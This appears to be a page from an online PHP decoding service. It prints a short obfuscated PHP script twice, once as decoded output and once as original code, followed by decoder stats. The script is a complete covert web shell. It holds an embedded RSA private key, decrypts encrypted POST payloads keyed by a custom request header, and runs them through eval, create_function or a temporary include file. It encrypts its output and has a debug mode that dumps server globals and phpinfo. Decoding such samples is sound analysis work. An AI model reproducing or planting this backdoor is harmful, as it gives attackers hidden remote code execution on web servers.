Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php define('EALGO','AES-128-CBC');define('CWW_SIG','//CWWSUBSCRIPT//');define('_PRK','LS..

Decoded Output download

<?php define('EALGO','AES-128-CBC');define('CWW_SIG','//CWWSUBSCRIPT//');define('_PRK','LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlDWFFJQkFBS0JnUUNuQzQrUVBIQ1FybXFwNC81STRPQk1ZUjJPa3k1MW12dmdpc0RNOFBEOCtZci9UMkhSCnJLWjM0YU1LcitvQzROVDlKL085MUJrRTlwNDFkZ1NEcWdnY3poUmxjTnAyaDB0eEdURWo1NEhSY2pBUDR1cVcKVEZKbWZONkZLYkw4SUhST2phVzNNZExxcU11VVBIWGZ0djlmZkR1RW0vV0tONmxUZGFpK0U4QjJ2d0lEQVFBQgpBb0dBZUtTYzF1c1AwUzVtMHJSYkhuOXEvejdVZmZoR2dhR2hjQlpHRUwyakR0R2JWYkViVUxlRXN1Zy9QS1M0Ck9jUHZqN2FmRHVaeisyV3g5YUo2dUN6QkZnSGNwR0RWRy9tSVphbWtZY0RHcGorMlpqU1ZwZjZ3aWh5ZHFyd20KWFdITVdsa2cvdURralJJZkViMmxlaGgzcG9YS3I5WGdBMXBraWRYS3JMN3dRT0VDUVFEVXlMMHRNVzdTRm9DYgpFblQxR2M4MHVuelBJNUQ4Y2JEOFFRbEVrZXFKSFpUUGRzV2Z0SU4wUGduRGk3T2pzdVRleVNmM3NHQlBQUFNGCm4wN05hM0piQWtFQXlQaTRjRmxURnVmaHlyZGNWeWZUSVJKSXFRNC91UjJQOEZZakhvVHlUcEttNzBEM0RrS1cKUHVTMDZraUZiOGJER3FrQWFVQ1htbDN3Z01Td08vRXliUUpCQU0rNDc4VHdud2tFNHFPQUR5RS9BdUtzc3k3Ygp2NnhScUw5NUZmMFVuV3NocjZZZ2dxaDM1bVJTTStIcnZZQ3ZJWExEMlBxWitrc2diRzBOcWpZckVFVUNRUUNECnRmWHlzNmZ2NENLcm40WW1ISlNUSFE5L3REWHhGVDNMYmpodi9RTnNtVkpNaFJBbFNXQjhjWmxiM2hHTmt2ODEKRHNPVk4xN2tMV0s4a2F0S2JhWDFBa0FRNHV6RzluY3lXNkJTVmhoOWRHU2d1THgwdm93S2VnTEJIQ08vajhCaApnSjdNUDFhRmFxaExvSkp6d0laekdiQ05QeFNXSS83VnFyZm0rdTRoZVduSgotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=');$VERSION="0.2.0";$ID=(md5_file(__FILE__)?md5_file(__FILE__):'-').' php-'.PHP_VERSION.'/'.PHP_OS.'/'.$_SERVER['SERVER_SOFTWARE'];error_reporting(-1);@set_time_limit(3600);@ini_set('implicit_flush','On');@ini_set('default_socket_timeout','3600');@ini_set('file_uploads','On');@ini_set('max_execution_time','3600');@ini_set('max_input_time','3600');@ini_set('upload_max_filesize','32M');@ini_set('post_max_size','32M');$_7ba=$_SERVER['REQUEST_METHOD'][0]?$_SERVER['REQUEST_METHOD'][0]: 'P';if($_7ba=='G'){if(isset($_GET['debug'])&&_indbg('./cwwdebug.data',$_GET['debug'])){error_reporting(-1);_prdbg();exit;}}if($_7ba!='P'){_eer(10);}$_abd=false;foreach($_SERVER as $_213=>$_abd){if(strtolower($_213)=='http_x_cww_tag'){$_abd=pack("H*",$_abd);break;}}if($_abd===false)_eer(20);$_016=false;$_e64=openssl_pkey_get_private(array(base64_decode(_PRK),''));openssl_private_decrypt($_abd,$_016,$_e64);if(!$_016)_eer(30);$_78f=preg_match_all('/^([0-9]{10}):([0-9a-f]{32}):([0-9a-f]{32})$/i',$_016,$_73a);if(!$_78f)_eer(40);if($_73a[1][0]<time())_eer(50);$_6a5=array();$_6a5[0]=pack("H*",$_73a[2][0]);$_6a5[1]=pack("H*",$_73a[3][0]);if(eval('return 1;'))$_ef1=1;else if(is_callable('create_function'))$_ef1=2;else if(is_callable('file_put_contents'))$_ef1=3;else _eer(60);$_7f3=array();for($i=9;$i>=0;$i--){$_32c=_udec($_POST[$i],$_7f3[$i]);if($_32c>0)_eer($_32c+70);}if(empty($_7f3[9]))_eer(80);while(@ob_end_clean());$_bda=32;ob_start('_out',2);_eer(0);for($i=0;$i<=9;$i++){if(empty($_7f3[$i]))continue;$_3da=false;switch($_ef1){case 1: if(!eval($_7f3[$i]))$_3da=true;break;case 2: if(!call_user_func(create_function(null,$_7f3[$i])))$_3da=true;break;case 3: $_64f=tempnam(sys_get_temp_dir(),time());if(file_put_contents($_64f,"<?php
".$_7f3[$i]."
return false;
?".'>')){if(!(include($_64f)))$_3da=true;unlink($_64f);}else{$_3da=true;}break;}if($_3da)_eer(90+$i);}ob_end_flush();while(@ob_end_flush());exit;function _eer($_216){global $ID,$VERSION;if($_216>0){sleep(1);header("HTTP/1.1 202 $_216");header('Connection: close',true);header("X-Cww-Err: $_216");}else{header('HTTP/1.1 200 OK');}header("X-Cww-Id: $VERSION $ID");header('Cache-Control: must-revalidate');header('Pragma: no-cache');header('Expires: Thu,1 Jan 1970 00:00:01 GMT');flush();if(!$_216)return;exit;}function _dec(&$_c97,&$_12c){global $_6a5;$_12c=openssl_decrypt($_c97,EALGO,$_6a5[0],false,$_6a5[1]);return $_12c||false;}function _enc(&$_379,&$_c97){global $_6a5;$_c97=openssl_encrypt($_379,EALGO,$_6a5[0],false,$_6a5[1]);return $_c97||false;}function _unz(&$_ed9,&$_e68){if(function_exists('gzdecode')){$_e68=gzdecode($_ed9);return $_e68||false;}else if(substr($_ed9,0,3)==""){$i=10;$_5f4=ord(substr($_ed9,3,1));if($_5f4>0){if($_5f4 & 4){list($_2d6)=unpack('v',substr($_ed9,$i,2));$i=$i+2+$_2d6;}if($_5f4 & 8)$i=strpos($_ed9,"",$i)+1;if($_5f4 & 16)$i=strpos($_ed9,"",$i)+1;if($_5f4 & 2)$i=$i+2;}$_e68=gzinflate(substr($_ed9,$i,-8));return $_e68||false;}return false;}function _udec(&$_c97,&$_12c){if(empty($_c97))return-1;$_ed9=false;if(!_dec($_c97,$_ed9))return 1;if(!_unz($_ed9,$_12c))return 2;$_c13=strpos($_12c,CWW_SIG);if($_c13===false||$_c13!=0)return 3;return 0;}$_829='';$_bd0=0;function _out($_61f,$_996){global $_829,$_bd0,$_bda;$_829.=$_61f;$_bd0++;$_6aa=NULL;if($_829&&($_996||$_bd0>$_bda)){global $_6a5;$_8b5=gzencode($_829);_enc($_8b5,$_6aa,$_6a5[0],$_6a5[1]);$_6aa.="
";$_bd0=0;$_829=NULL;}return $_6aa;}function _indbg($_b98,$_a09){if($_8df=fopen($_b98,'r')){$_094=fgets($_8df);fclose($_8df);return $_a09==trim($_094);}return false;}function _prdbg(){global $VERSION;echo "<html><pre>
";echo "OUR VERSION: $VERSION

";echo "GLOBAL VARS:
";print_r($GLOBALS);$_09a=array('openssl_get_cipher_methods','openssl_pkey_get_private','openssl_private_decrypt','openssl_decrypt','openssl_encrypt','gzdecode','gzencode','gzinflate','create_function','call_user_func','file_put_contents','tempnam',);echo "

AVAILABLE FUNCTIONS:
";foreach($_09a as $f){echo "$f():	e:".(function_exists($f)+0).',c:'.(is_callable($f)+0)."
";}echo "

CURRENT DIR AND STATS:
";echo(getcwd())."
";print_r(stat('.'));if(is_callable('openssl_get_cipher_methods')){echo "

OPENSSL SUPPORTED METHODS:
";print_r(openssl_get_cipher_methods());}echo "

THIS SERVER DATE/TIME:
";echo(date('r'));if(is_callable('phpinfo')){echo "

PHP INFO:
";ob_start();phpinfo();$_c4f=ob_get_contents();ob_end_clean();$_c4f=preg_replace('/<[^>]+>/i',"	",$_c4f);echo "$_c4f
</pre></html>";}else{echo "

PHP INFO:(func is not callable)
";}} ?>

Did this file decode correctly?

Original Code

<?php define('EALGO','AES-128-CBC');define('CWW_SIG','//CWWSUBSCRIPT//');define('_PRK','LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlDWFFJQkFBS0JnUUNuQzQrUVBIQ1FybXFwNC81STRPQk1ZUjJPa3k1MW12dmdpc0RNOFBEOCtZci9UMkhSCnJLWjM0YU1LcitvQzROVDlKL085MUJrRTlwNDFkZ1NEcWdnY3poUmxjTnAyaDB0eEdURWo1NEhSY2pBUDR1cVcKVEZKbWZONkZLYkw4SUhST2phVzNNZExxcU11VVBIWGZ0djlmZkR1RW0vV0tONmxUZGFpK0U4QjJ2d0lEQVFBQgpBb0dBZUtTYzF1c1AwUzVtMHJSYkhuOXEvejdVZmZoR2dhR2hjQlpHRUwyakR0R2JWYkViVUxlRXN1Zy9QS1M0Ck9jUHZqN2FmRHVaeisyV3g5YUo2dUN6QkZnSGNwR0RWRy9tSVphbWtZY0RHcGorMlpqU1ZwZjZ3aWh5ZHFyd20KWFdITVdsa2cvdURralJJZkViMmxlaGgzcG9YS3I5WGdBMXBraWRYS3JMN3dRT0VDUVFEVXlMMHRNVzdTRm9DYgpFblQxR2M4MHVuelBJNUQ4Y2JEOFFRbEVrZXFKSFpUUGRzV2Z0SU4wUGduRGk3T2pzdVRleVNmM3NHQlBQUFNGCm4wN05hM0piQWtFQXlQaTRjRmxURnVmaHlyZGNWeWZUSVJKSXFRNC91UjJQOEZZakhvVHlUcEttNzBEM0RrS1cKUHVTMDZraUZiOGJER3FrQWFVQ1htbDN3Z01Td08vRXliUUpCQU0rNDc4VHdud2tFNHFPQUR5RS9BdUtzc3k3Ygp2NnhScUw5NUZmMFVuV3NocjZZZ2dxaDM1bVJTTStIcnZZQ3ZJWExEMlBxWitrc2diRzBOcWpZckVFVUNRUUNECnRmWHlzNmZ2NENLcm40WW1ISlNUSFE5L3REWHhGVDNMYmpodi9RTnNtVkpNaFJBbFNXQjhjWmxiM2hHTmt2ODEKRHNPVk4xN2tMV0s4a2F0S2JhWDFBa0FRNHV6RzluY3lXNkJTVmhoOWRHU2d1THgwdm93S2VnTEJIQ08vajhCaApnSjdNUDFhRmFxaExvSkp6d0laekdiQ05QeFNXSS83VnFyZm0rdTRoZVduSgotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=');$VERSION="0.2.0";$ID=(md5_file(__FILE__)?md5_file(__FILE__):'-').' php-'.PHP_VERSION.'/'.PHP_OS.'/'.$_SERVER['SERVER_SOFTWARE'];error_reporting(-1);@set_time_limit(3600);@ini_set('implicit_flush','On');@ini_set('default_socket_timeout','3600');@ini_set('file_uploads','On');@ini_set('max_execution_time','3600');@ini_set('max_input_time','3600');@ini_set('upload_max_filesize','32M');@ini_set('post_max_size','32M');$_7ba=$_SERVER['REQUEST_METHOD'][0]?$_SERVER['REQUEST_METHOD'][0]: 'P';if($_7ba=='G'){if(isset($_GET['debug'])&&_indbg('./cwwdebug.data',$_GET['debug'])){error_reporting(-1);_prdbg();exit;}}if($_7ba!='P'){_eer(10);}$_abd=false;foreach($_SERVER as $_213=>$_abd){if(strtolower($_213)=='http_x_cww_tag'){$_abd=pack("H*",$_abd);break;}}if($_abd===false)_eer(20);$_016=false;$_e64=openssl_pkey_get_private(array(base64_decode(_PRK),''));openssl_private_decrypt($_abd,$_016,$_e64);if(!$_016)_eer(30);$_78f=preg_match_all('/^([0-9]{10}):([0-9a-f]{32}):([0-9a-f]{32})$/i',$_016,$_73a);if(!$_78f)_eer(40);if($_73a[1][0]<time())_eer(50);$_6a5=array();$_6a5[0]=pack("H*",$_73a[2][0]);$_6a5[1]=pack("H*",$_73a[3][0]);if(eval('return 1;'))$_ef1=1;else if(is_callable('create_function'))$_ef1=2;else if(is_callable('file_put_contents'))$_ef1=3;else _eer(60);$_7f3=array();for($i=9;$i>=0;$i--){$_32c=_udec($_POST[$i],$_7f3[$i]);if($_32c>0)_eer($_32c+70);}if(empty($_7f3[9]))_eer(80);while(@ob_end_clean());$_bda=32;ob_start('_out',2);_eer(0);for($i=0;$i<=9;$i++){if(empty($_7f3[$i]))continue;$_3da=false;switch($_ef1){case 1: if(!eval($_7f3[$i]))$_3da=true;break;case 2: if(!call_user_func(create_function(null,$_7f3[$i])))$_3da=true;break;case 3: $_64f=tempnam(sys_get_temp_dir(),time());if(file_put_contents($_64f,"<?php\n".$_7f3[$i]."\nreturn false;\n?".'>')){if(!(include($_64f)))$_3da=true;unlink($_64f);}else{$_3da=true;}break;}if($_3da)_eer(90+$i);}ob_end_flush();while(@ob_end_flush());exit;function _eer($_216){global $ID,$VERSION;if($_216>0){sleep(1);header("HTTP/1.1 202 $_216");header('Connection: close',true);header("X-Cww-Err: $_216");}else{header('HTTP/1.1 200 OK');}header("X-Cww-Id: $VERSION $ID");header('Cache-Control: must-revalidate');header('Pragma: no-cache');header('Expires: Thu,1 Jan 1970 00:00:01 GMT');flush();if(!$_216)return;exit;}function _dec(&$_c97,&$_12c){global $_6a5;$_12c=openssl_decrypt($_c97,EALGO,$_6a5[0],false,$_6a5[1]);return $_12c||false;}function _enc(&$_379,&$_c97){global $_6a5;$_c97=openssl_encrypt($_379,EALGO,$_6a5[0],false,$_6a5[1]);return $_c97||false;}function _unz(&$_ed9,&$_e68){if(function_exists('gzdecode')){$_e68=gzdecode($_ed9);return $_e68||false;}else if(substr($_ed9,0,3)=="\x1f\x8b\x08"){$i=10;$_5f4=ord(substr($_ed9,3,1));if($_5f4>0){if($_5f4 & 4){list($_2d6)=unpack('v',substr($_ed9,$i,2));$i=$i+2+$_2d6;}if($_5f4 & 8)$i=strpos($_ed9,"\0",$i)+1;if($_5f4 & 16)$i=strpos($_ed9,"\0",$i)+1;if($_5f4 & 2)$i=$i+2;}$_e68=gzinflate(substr($_ed9,$i,-8));return $_e68||false;}return false;}function _udec(&$_c97,&$_12c){if(empty($_c97))return-1;$_ed9=false;if(!_dec($_c97,$_ed9))return 1;if(!_unz($_ed9,$_12c))return 2;$_c13=strpos($_12c,CWW_SIG);if($_c13===false||$_c13!=0)return 3;return 0;}$_829='';$_bd0=0;function _out($_61f,$_996){global $_829,$_bd0,$_bda;$_829.=$_61f;$_bd0++;$_6aa=NULL;if($_829&&($_996||$_bd0>$_bda)){global $_6a5;$_8b5=gzencode($_829);_enc($_8b5,$_6aa,$_6a5[0],$_6a5[1]);$_6aa.="\n";$_bd0=0;$_829=NULL;}return $_6aa;}function _indbg($_b98,$_a09){if($_8df=fopen($_b98,'r')){$_094=fgets($_8df);fclose($_8df);return $_a09==trim($_094);}return false;}function _prdbg(){global $VERSION;echo "<html><pre>\n";echo "OUR VERSION: $VERSION\n\n";echo "GLOBAL VARS:\n";print_r($GLOBALS);$_09a=array('openssl_get_cipher_methods','openssl_pkey_get_private','openssl_private_decrypt','openssl_decrypt','openssl_encrypt','gzdecode','gzencode','gzinflate','create_function','call_user_func','file_put_contents','tempnam',);echo "\n\nAVAILABLE FUNCTIONS:\n";foreach($_09a as $f){echo "$f():\te:".(function_exists($f)+0).',c:'.(is_callable($f)+0)."\n";}echo "\n\nCURRENT DIR AND STATS:\n";echo(getcwd())."\n";print_r(stat('.'));if(is_callable('openssl_get_cipher_methods')){echo "\n\nOPENSSL SUPPORTED METHODS:\n";print_r(openssl_get_cipher_methods());}echo "\n\nTHIS SERVER DATE/TIME:\n";echo(date('r'));if(is_callable('phpinfo')){echo "\n\nPHP INFO:\n";ob_start();phpinfo();$_c4f=ob_get_contents();ob_end_clean();$_c4f=preg_replace('/<[^>]+>/i',"\t",$_c4f);echo "$_c4f\n</pre></html>";}else{echo "\n\nPHP INFO:(func is not callable)\n";}} ?>

Function Calls

define

Variables

None

Stats

MD5	5c920a8c2805d3d2e82e51897f4786d4
Eval Count	0
Decode Time	127 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats